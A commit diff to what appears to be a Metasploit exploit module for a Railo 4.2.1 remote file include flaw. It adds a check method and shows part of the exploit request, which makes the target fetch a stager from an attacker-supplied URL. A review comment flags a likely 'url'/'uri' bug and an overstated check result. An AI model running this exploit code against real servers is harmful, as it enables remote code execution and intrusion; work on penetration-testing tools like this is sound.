Add check method

bug/bundler_fix
Brandon Perry 2014-09-02 21:35:47 -05:00
parent 438f0e6365
commit ee3e5c9159
1 changed files with 11 additions and 4 deletions


@ -17,10 +17,10 @@ class Metasploit4 < Msf::Exploit::Remote
'Description' => %q{
This module exploits a remote file include vulnerability in Railo,
tested against version 4.2.1. First, a call using a vulnerable
<cffile> line in thumbnail.cfm allows an attacker to download an
arbitrary PNG file. By appending a .cfm and taking advantage of
<cffile> line in thumbnail.cfm allows an atacker to download an
arbitrary PNG file. By appending a .cfm, and taking advantage of
a directory traversal, an attacker can append cold fusion markup
to the PNG file and have it interpreted by the server. This is
to the PNG file, and have it interpreted by the server. This is
used to stage and execute a fully-fledged payload.
},
'License' => MSF_LICENSE,
@ -63,6 +63,13 @@ class Metasploit4 < Msf::Exploit::Remote
end
def check
res = send_request_cgi({
'url' => normalize_uri(target_uri.path, 'res', 'css', 'admin42.css.cfm')
})
return Exploit::CheckCode::Appears if res and res.code == 200
return Exploit::CheckCode::Safe
end
def exploit
@ -92,7 +99,7 @@ class Metasploit4 < Msf::Exploit::Remote
wh = '5000' #width and height
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path + '/admin/thumbnail.cfm'),
'uri' => normalize_uri(target_uri.path, 'admin', 'thumbnail.cfm'),
'vars_get' => {
'img' => url + '/' + stager_name,
'height' => wh,
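Review bot: In the new `check` method the request hash is keyed `'url'`, while the other `send_request_cgi` call in this file section uses `'uri'`. If `'url'` is not a recognised option, the normalized path is ignored and the request presumably falls back to the client's default URI, so any host answering 200 there would be reported as `Appears`. The line should read `'uri' => normalize_uri(target_uri.path, 'res', 'css', 'admin42.css.cfm')`. Even with that fixed, a 200 on a static admin stylesheet only shows that Railo admin resources are reachable, not that the tested version is affected, so `Exploit::CheckCode::Detected` is likely the more accurate result unless the response body is also matched against a version fingerprint. The description hunk also shows the spelling `atacker`; if that line is on the new side it should read `attacker`.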